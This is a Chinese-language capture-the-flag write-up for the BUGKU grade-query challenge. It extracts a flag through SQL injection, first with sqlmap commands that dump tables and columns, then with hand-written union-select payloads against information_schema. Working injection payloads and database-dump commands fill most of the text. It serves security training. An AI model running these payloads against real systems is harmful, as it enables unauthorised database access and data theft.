BUGKU-成绩查询

打开环境

 随便输入

 发现URL 不传参 怀疑是POST型

于是我们查看源代码

发现是POST型

开始注入

一.sqlmap

打开终端

因为是POST型 所以有两种方式

1.通过BP抓包把HTTP数据包下载下来

语法：sqlmap -r "txt地址"

kali中要下载数据包 我们在物理windows系统上的BP进行抓取

 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中，或者直接从桌面拖到kali桌面中

打开sqlmap

运行指令sqlmap -r "bugku.txt"

于是我们开始爆破库

sqlmap -r "bugku.txt" --tables

 把库名和表名爆出来了

然后我们发现fl4g

开始查找flag

sqlmap -r "bugku.txt" -D skctf -T fl4g --columns

开始爆密码

sqlmap -r "bugku.txt" -D skctf -T fl4g -C skctf_flag --dump

得出flag

2.运用sqlmap对应POST指令

语法：sqlmap -u "URL" --data="id=1"

该指令是用于URL的

打开sqlmap

运行指令：

sqlmap -u "http://114.67.175.224:17647/index.php/index.php" --data="id=1"

开始爆库

sqlmap -u "http://114.67.175.224:17647/index.php/index.php" --data="id=1" --tables

 得到数据库和表 于是和上面一样开始爆破即可

二.手工注入

打开环境

随便输入一个查询

有回显

 于是我们开始查找注入点和有没有过滤

当我们输入1‘ ， 1时可以返回正常值 说明有可能是 id=’ ‘类型

于是我们可以开始使用order by n猜字段

输入 1’ order by 1尝试

 有回显 于是依次尝试但是我们发现 一直尝试了很多次都有回显

我们就怀疑是不是有过滤 有可能是id=‘’  ‘于是我们尝试注入 order by n #

发现在 1’ order by 5#时没有回显 所以有四个字符段

开始查看四个哪个有回显

先用-1尝试数据库有没有-1的数据

发现没有 于是用

-1‘ union select 1,2,3,4 #

来查看回显

 发现四个都有回显 所以我们可以随便在其中一个位置进行查看

开始爆库

-1' union select database(),2,3,4 # （4 # 中间有空格）

 回显出数据库skctf

开始爆表

-1' union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='skctf'#

发现fl4g

开始暴字段

-1' union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name='fl4g'#

 得到字段名 所以可以得到flag了

-1' union select 1,2,3,group_concat(skctf_flag)from skctf.fl4g#

得到flag

结束